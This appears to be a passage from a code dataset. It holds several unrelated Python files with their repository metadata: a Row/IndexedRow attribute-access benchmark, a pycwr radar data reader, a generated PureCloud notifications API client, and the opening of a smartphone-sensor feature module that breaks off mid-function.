A row in L{DataFrame}. The fields in it can be accessed like attributes.
Row can be used to create a row object by using named arguments,
the fields will be sorted by names.
>>> row = Row(name="Alice", age=11)
>>> row
Row(age=11, name='Alice')
>>> row.name, row.age
('Alice', 11)
Row also can be used to create another Row like class, then it
could be used to create Row objects, such as
>>> Person = Row("name", "age")
>>> Person
<Row(name, age)>
>>> Person("Alice", 11)
Row(name='Alice', age=11)
"""
def __new__(self, *args, **kwargs):
if args and kwargs:
raise ValueError("Can not use both args "
"and kwargs to create Row")
if args:
# create row class or objects
return tuple.__new__(self, args)
elif kwargs:
# create row objects
names = sorted(kwargs.keys())
row = tuple.__new__(self, [kwargs[n] for n in names])
row.__fields__ = names
return row
else:
raise ValueError("No args or kwargs")
def asDict(self, recursive=False):
"""
Return as an dict
:param recursive: turns the nested Row as dict (default: False).
>>> Row(name="Alice", age=11).asDict() == {'name': 'Alice', 'age': 11}
True
>>> row = Row(key=1, value=Row(name='a', age=2))
>>> row.asDict() == {'key': 1, 'value': Row(age=2, name='a')}
True
>>> row.asDict(True) == {'key': 1, 'value': {'name': 'a', 'age': 2}}
True
"""
if not hasattr(self, "__fields__"):
raise TypeError("Cannot convert a Row class into dict")
if recursive:
def conv(obj):
if isinstance(obj, Row):
return obj.asDict(True)
elif isinstance(obj, list):
return [conv(o) for o in obj]
elif isinstance(obj, dict):
return dict((k, conv(v)) for k, v in obj.items())
else:
return obj
return dict(zip(self.__fields__, (conv(o) for o in self)))
else:
return dict(zip(self.__fields__, self))
# let object acts like class
def __call__(self, *args):
"""create new Row object"""
return _create_row(self, args)
def __getattr__(self, item):
if item.startswith("__"):
raise AttributeError(item)
try:
# it will be slow when it has many fields,
# but this will not be used in normal cases
idx = self.__fields__.index(item)
return self[idx]
except IndexError:
raise AttributeError(item)
except ValueError:
raise AttributeError(item)
def __setattr__(self, key, value):
if key != '__fields__':
raise Exception("Row is read-only")
self.__dict__[key] = value
def __reduce__(self):
"""Returns a tuple so Python knows how to pickle Row."""
if hasattr(self, "__fields__"):
return (_create_row, (self.__fields__, tuple(self)))
else:
return tuple.__reduce__(self)
def __repr__(self):
"""Printable representation of Row used in Python REPL."""
if hasattr(self, "__fields__"):
return "Row(%s)" % ", ".join("%s=%r" % (k, v)
for k, v in zip(self.__fields__, tuple(self)))
else:
return "<Row(%s)>" % ", ".join(self)
def _create_indexed_row(fields, values):
row = Row(*values)
row.__fields__ = fields
row.__fieldindex__ = dict(zip(fields, range(len(fields))))
return row
class IndexedRow(tuple):
"""
A row in L{DataFrame}. The fields in it can be accessed like attributes.
Row can be used to create a row object by using named arguments,
the fields will be sorted by names.
>>> row = Row(name="Alice", age=11)
>>> row
Row(age=11, name='Alice')
>>> row.name, row.age
('Alice', 11)
Row also can be used to create another Row like class, then it
could be used to create Row objects, such as
>>> Person = Row("name", "age")
>>> Person
<Row(name, age)>
>>> Person("Alice", 11)
Row(name='Alice', age=11)
"""
def __new__(self, *args, **kwargs):
if args and kwargs:
raise ValueError("Can not use both args "
"and kwargs to create Row")
if args:
# create row class or objects
return tuple.__new__(self, args)
elif kwargs:
# create row objects
names = sorted(kwargs.keys())
row = tuple.__new__(self, [kwargs[n] for n in names])
row.__fields__ = names
row.__fieldindex__ = dict(zip(names, range(len(names))))
return row
else:
raise ValueError("No args or kwargs")
def asDict(self, recursive=False):
"""
Return as an dict
:param recursive: turns the nested Row as dict (default: False).
>>> Row(name="Alice", age=11).asDict() == {'name': 'Alice', 'age': 11}
True
>>> row = Row(key=1, value=Row(name='a', age=2))
>>> row.asDict() == {'key': 1, 'value': Row(age=2, name='a')}
True
>>> row.asDict(True) == {'key': 1, 'value': {'name': 'a', 'age': 2}}
True
"""
if not hasattr(self, "__fields__"):
raise TypeError("Cannot convert a Row class into dict")
if recursive:
def conv(obj):
if isinstance(obj, Row):
return obj.asDict(True)
elif isinstance(obj, list):
return [conv(o) for o in obj]
elif isinstance(obj, dict):
return dict((k, conv(v)) for k, v in obj.items())
else:
return obj
return dict(zip(self.__fields__, (conv(o) for o in self)))
else:
return dict(zip(self.__fields__, self))
# let object acts like class
def __call__(self, *args):
"""create new Row object"""
return _create_indexed_row(self, args)
def __getattr__(self, item):
if item.startswith("__"):
raise AttributeError(item)
try:
# it will be slow when it has many fields,
# but this will not be used in normal cases
idx = self.__fieldindex__[item]
return self[idx]
except IndexError:
raise AttributeError(item)
except ValueError:
raise AttributeError(item)
except KeyError:
raise AttributeError(item)
def __setattr__(self, key, value):
if key not in ('__fields__', '__fieldindex__'):
raise Exception("Row is read-only")
self.__dict__[key] = value
def __reduce__(self):
"""Returns a tuple so Python knows how to pickle Row."""
if hasattr(self, "__fields__"):
return (_create_indexed_row, (self.__fields__, tuple(self)))
else:
return tuple.__reduce__(self)
def __repr__(self):
"""Printable representation of Row used in Python REPL."""
if hasattr(self, "__fields__"):
return "Row(%s)" % ", ".join("%s=%r" % (k, v)
for k, v in zip(self.__fields__, tuple(self)))
else:
return "<Row(%s)>" % ", ".join(self)
def generate_field_list(num, seed=None):
length = 0
fields = []
random.seed(seed)
while length != num:
fields = ['f' + md5('field' + str(random.randint(0, 10000000))).hexdigest() for _ in range(num)]
length = len(set(fields))
return fields
def generate_data(fields, seed=None):
res = {}
random.seed(seed)
for f in fields:
res[f] = random.randint(1, 1000000000) if random.random() < 0.5 \
else md5('field' + str(random.randint(0, 10000000))).hexdigest()
return res
def test(row, fields, num):
data = generate_data(fields)
num_fields = len(fields)
start = time.time()
ds = [row(**data) for _ in range(num)]
print 'Created %10d %s objects with %3d fields in %6.2f sec' % (num, row.__name__, num_fields, time.time()-start)
start = time.time()
for field in fields:
tds = [r.__getattr__(field) for r in ds]
print 'Queried %10d %s objects with %3d fields in %6.2f sec' % (num, row.__name__, num_fields, time.time()-start)
def main():
for obj in [Row, IndexedRow]:
for num_fields in range(1, 101):
test(obj, generate_field_list(num_fields), 1000000)
if __name__ == "__main__":
main()
| 31.412587
| 117
| 0.54675
| 1,122
| 8,984
| 4.171123
| 0.154189
| 0.023932
| 0.020513
| 0.023932
| 0.839744
| 0.836752
| 0.836752
| 0.836752
| 0.818803
| 0.800855
| 0
| 0.015897
| 0.327805
| 8,984
| 285
| 118
| 31.522807
| 0.759066
| 0.03484
| 0
| 0.71875
| 0
| 0
| 0.078836
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.01875
| null | null | 0.0125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3dcfee446a3876c1eab5362ab5513a5986b3b371
| 3,573
|
py
|
Python
|
pycwr/io/__init__.py
|
1271756664/study
|
8013dd6c597618949c5fcbf86e38502525a8136d
|
[
"MIT"
] | 144
|
2019-11-27T14:36:41.000Z
|
2022-02-23T08:21:17.000Z
|
pycwr/io/__init__.py
|
1271756664/study
|
8013dd6c597618949c5fcbf86e38502525a8136d
|
[
"MIT"
] | 32
|
2019-11-29T10:11:53.000Z
|
2022-03-14T07:46:44.000Z
|
pycwr/io/__init__.py
|
1271756664/study
|
8013dd6c597618949c5fcbf86e38502525a8136d
|
[
"MIT"
] | 57
|
2019-11-27T12:51:44.000Z
|
2022-01-29T14:50:05.000Z
|
from . import SCFile, WSR98DFile, SABFile, CCFile, PAFile
from .util import radar_format
__all__ = ["read_auto", "CCFile", "SCFile", "WSR98DFile", "SABFile"]
def read_auto(filename, station_lon=None, station_lat=None, station_alt=None):
"""
:param filename: radar basedata filename
:param station_lon: radar station longitude //units: degree east
:param station_lat: radar station latitude //units:degree north
:param station_alt: radar station altitude //units: meters
"""
radar_type = radar_format(filename)
if radar_type == "WSR98D":
return WSR98DFile.WSR98D2NRadar(WSR98DFile.WSR98DBaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
elif radar_type == "SAB":
return SABFile.SAB2NRadar(SABFile.SABBaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
elif radar_type == "CC":
return CCFile.CC2NRadar(CCFile.CCBaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
elif radar_type == "SC":
return SCFile.SC2NRadar(SCFile.SCBaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
elif radar_type == "PA":
return PAFile.PA2NRadar(PAFile.PABaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
else:
raise TypeError("unsupported radar type!")
def read_SAB(filename, station_lon=None, station_lat=None, station_alt=None):
"""
:param filename: radar basedata filename
:param station_lon: radar station longitude //units: degree east
:param station_lat: radar station latitude //units:degree north
:param station_alt: radar station altitude //units: meters
"""
return SABFile.SAB2NRadar(SABFile.SABBaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
def read_CC(filename, station_lon=None, station_lat=None, station_alt=None):
"""
:param filename: radar basedata filename
:param station_lon: radar station longitude //units: degree east
:param station_lat: radar station latitude //units:degree north
:param station_alt: radar station altitude //units: meters
"""
return CCFile.CC2NRadar(CCFile.CCBaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
def read_SC(filename, station_lon=None, station_lat=None, station_alt=None):
"""
:param filename: radar basedata filename
:param station_lon: radar station longitude //units: degree east
:param station_lat: radar station latitude //units:degree north
:param station_alt: radar station altitude //units: meters
"""
return SCFile.SC2NRadar(SCFile.SCBaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
def read_WSR98D(filename, station_lon=None, station_lat=None, station_alt=None):
"""
:param filename: radar basedata filename
:param station_lon: radar station longitude //units: degree east
:param station_lat: radar station latitude //units:degree north
:param station_alt: radar station altitude //units: meters
"""
return WSR98DFile.WSR98D2NRadar(WSR98DFile.WSR98DBaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
def read_PA(filename, station_lon=None, station_lat=None, station_alt=None):
"""
:param filename: radar basedata filename
:param station_lon: radar station longitude //units: degree east
:param station_lat: radar station latitude //units:degree north
:param station_alt: radar station altitude //units: meters
"""
return PAFile.PA2NRadar(PAFile.PABaseData(filename, station_lon, station_lat, station_alt)).ToPRD()
| 50.323944
| 123
| 0.736636
| 444
| 3,573
| 5.736486
| 0.121622
| 0.086376
| 0.113074
| 0.098155
| 0.907735
| 0.907735
| 0.907735
| 0.907735
| 0.907735
| 0.907735
| 0
| 0.01133
| 0.16009
| 3,573
| 70
| 124
| 51.042857
| 0.837388
| 0.390988
| 0
| 0.37037
| 0
| 0
| 0.037755
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.074074
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
9a717733af978bd262ece0750855549656f30728
| 23,130
|
py
|
Python
|
libs/PureCloudPlatformClientV2/apis/notifications_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 1
|
2021-10-08T20:46:45.000Z
|
2021-10-08T20:46:45.000Z
|
libs/PureCloudPlatformClientV2/apis/notifications_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | null | null | null |
libs/PureCloudPlatformClientV2/apis/notifications_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
NotificationsApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class NotificationsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def delete_notifications_channel_subscriptions(self, channel_id, **kwargs):
"""
Remove all subscriptions
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_notifications_channel_subscriptions(channel_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str channel_id: Channel ID (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['channel_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_notifications_channel_subscriptions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'channel_id' is set
if ('channel_id' not in params) or (params['channel_id'] is None):
raise ValueError("Missing the required parameter `channel_id` when calling `delete_notifications_channel_subscriptions`")
resource_path = '/api/v2/notifications/channels/{channelId}/subscriptions'.replace('{format}', 'json')
path_params = {}
if 'channel_id' in params:
path_params['channelId'] = params['channel_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_notifications_availabletopics(self, **kwargs):
"""
Get available notification topics.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_notifications_availabletopics(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] expand: Which fields, if any, to expand
:param bool include_preview: Whether or not to include Preview topics
:return: AvailableTopicEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['expand', 'include_preview']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_notifications_availabletopics" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/notifications/availabletopics'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'expand' in params:
query_params['expand'] = params['expand']
if 'include_preview' in params:
query_params['includePreview'] = params['include_preview']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AvailableTopicEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_notifications_channel_subscriptions(self, channel_id, **kwargs):
"""
The list of all subscriptions for this channel
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_notifications_channel_subscriptions(channel_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str channel_id: Channel ID (required)
:return: ChannelTopicEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['channel_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_notifications_channel_subscriptions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'channel_id' is set
if ('channel_id' not in params) or (params['channel_id'] is None):
raise ValueError("Missing the required parameter `channel_id` when calling `get_notifications_channel_subscriptions`")
resource_path = '/api/v2/notifications/channels/{channelId}/subscriptions'.replace('{format}', 'json')
path_params = {}
if 'channel_id' in params:
path_params['channelId'] = params['channel_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChannelTopicEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_notifications_channels(self, **kwargs):
"""
The list of existing channels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_notifications_channels(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str includechannels: Show user's channels for this specific token or across all tokens for this user and app. Channel Ids for other access tokens will not be shown, but will be presented to show their existence.
:return: ChannelEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['includechannels']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_notifications_channels" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/notifications/channels'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'includechannels' in params:
query_params['includechannels'] = params['includechannels']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChannelEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_notifications_channel_subscriptions(self, channel_id, body, **kwargs):
"""
Add a list of subscriptions to the existing list of subscriptions
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_notifications_channel_subscriptions(channel_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str channel_id: Channel ID (required)
:param list[ChannelTopic] body: Body (required)
:return: ChannelTopicEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['channel_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_notifications_channel_subscriptions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'channel_id' is set
if ('channel_id' not in params) or (params['channel_id'] is None):
raise ValueError("Missing the required parameter `channel_id` when calling `post_notifications_channel_subscriptions`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_notifications_channel_subscriptions`")
resource_path = '/api/v2/notifications/channels/{channelId}/subscriptions'.replace('{format}', 'json')
path_params = {}
if 'channel_id' in params:
path_params['channelId'] = params['channel_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChannelTopicEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_notifications_channels(self, **kwargs):
"""
Create a new channel
There is a limit of 20 channels per user/app combination. Creating a 21st channel will remove the channel with oldest last used date. Channels without an active connection will be removed first.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_notifications_channels(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Channel
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_notifications_channels" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/notifications/channels'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Channel',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_notifications_channel_subscriptions(self, channel_id, body, **kwargs):
"""
Replace the current list of subscriptions with a new list.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_notifications_channel_subscriptions(channel_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str channel_id: Channel ID (required)
:param list[ChannelTopic] body: Body (required)
:return: ChannelTopicEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['channel_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_notifications_channel_subscriptions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'channel_id' is set
if ('channel_id' not in params) or (params['channel_id'] is None):
raise ValueError("Missing the required parameter `channel_id` when calling `put_notifications_channel_subscriptions`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `put_notifications_channel_subscriptions`")
resource_path = '/api/v2/notifications/channels/{channelId}/subscriptions'.replace('{format}', 'json')
path_params = {}
if 'channel_id' in params:
path_params['channelId'] = params['channel_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChannelTopicEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 38.743719
| 227
| 0.559014
| 2,229
| 23,130
| 5.614177
| 0.109018
| 0.031645
| 0.024932
| 0.021256
| 0.836583
| 0.832747
| 0.831629
| 0.824357
| 0.813089
| 0.813089
| 0
| 0.001492
| 0.362516
| 23,130
| 596
| 228
| 38.808725
| 0.847202
| 0.279464
| 0
| 0.806557
| 0
| 0
| 0.184776
| 0.058801
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02623
| false
| 0
| 0.022951
| 0
| 0.07541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9a75aa4695d19c9f81142de9801ffff7f439092f
| 147,813
|
py
|
Python
|
core/admission_control_marker/phone_features.py
|
MD2Korg/CerebralCortex-DataDebugger
|
f2e34337cd7e47fde77a7ccad32ea55da972caec
|
[
"BSD-2-Clause"
] | null | null | null |
core/admission_control_marker/phone_features.py
|
MD2Korg/CerebralCortex-DataDebugger
|
f2e34337cd7e47fde77a7ccad32ea55da972caec
|
[
"BSD-2-Clause"
] | null | null | null |
core/admission_control_marker/phone_features.py
|
MD2Korg/CerebralCortex-DataDebugger
|
f2e34337cd7e47fde77a7ccad32ea55da972caec
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2018, MD2K Center of Excellence
# - Md Shiplu Hawlader <shiplu.cse.du@gmail.com; mhwlader@memphis.edu>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
from cerebralcortex.core.datatypes.datastream import DataStream
from cerebralcortex.core.datatypes.datastream import DataPoint
from cerebralcortex.core.datatypes.stream_types import StreamTypes
from core.computefeature import ComputeFeatureBase
from urllib.request import urlopen
from bs4 import BeautifulSoup
import datetime
import numpy as np
from datetime import timedelta
import time
import copy
import traceback
from functools import lru_cache
import math
import base64
import pickle
from sklearn.mixture import GaussianMixture
from typing import List, Callable, Any
feature_class_name = 'PhoneFeatures'
# Constants
IN_VEHICLE = 6.0
ON_BICYCLE = 5.0
STILL = 0.0
ON_FOOT = 1.0
TILTING = 2.0
WALKING = 3.0
RUNNING = 4.0
UNKNOWN = 7.0
OUTGOING_TYPE = 2.0
MESSAGE_TYPE_SENT = 2.0
class PhoneFeatures(ComputeFeatureBase):
"""
This class is responsible for computing features based on streams of data
derived from the smartphone sensors.
"""
def get_filtered_data(self, data: List[DataPoint],
admission_control: Callable[[Any], bool] = None) -> List[DataPoint]:
"""
Return the filtered list of DataPoints according to the admission control provided
:param List(DataPoint) data: Input data list
:param Callable[[Any], bool] admission_control: Admission control lambda function, which accepts the sample and
returns a bool based on the data sample validity
:return: Filtered list of DataPoints
:rtype: List(DataPoint)
"""
if admission_control is None:
return data
filtered_data = []
for d in data:
if admission_control(d.sample):
filtered_data.append(d)
elif type(d.sample) is list and len(d.sample) == 1 and admission_control(d.sample[0]):
d.sample = d.sample[0]
filtered_data.append(d)
return filtered_data
def get_data_by_stream_name(self, stream_name: str, user_id: str, day: str,
localtime: bool=True, ingested_stream=True) -> List[DataPoint]:
"""
Combines data from multiple streams data of same stream based on stream name.
:param str stream_name: Name of the stream
:param str user_id: UUID of the stream owner
:param str day: The day (YYYYMMDD) on which to operate
:param bool localtime: The way to structure time, True for operating in participant's local time, False for UTC
:return: Combined stream data if there are multiple stream id
:rtype: List(DataPoint)
"""
if ingested_stream:
stream_ids = self.CC.get_stream_id(user_id, stream_name)
else:
stream_ids = self.get_latest_stream_id(user_id, stream_name)
data = []
for stream in stream_ids:
if stream is not None:
ds = self.CC.get_stream(stream['identifier'], user_id=user_id, day=day, localtime=localtime)
if ds is not None:
if ds.data is not None:
data += ds.data
if len(stream_ids) > 1:
data = sorted(data, key=lambda x: x.start_time)
return data
def inter_event_time_list(self, data: List[DataPoint]) -> List[float]:
"""
Helper function to compute inter-event times
:param List(DataPoint) data: A list of DataPoints
:return: Time deltas between DataPoints in minutes
:rtype: list(float)
"""
if len(data) == 0:
return None
last_end = data[0].end_time
ret = []
flag = False
for cd in data:
if flag == False:
flag = True
continue
dif = cd.start_time - last_end
ret.append(max(0, dif.total_seconds()))
last_end = max(last_end, cd.end_time)
return list(map(lambda x: x / 60.0, ret))
def average_inter_phone_call_sms_time_hourly(self, phonedata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
"""
Average time (in minutes) between two consecutive events (call and sms)
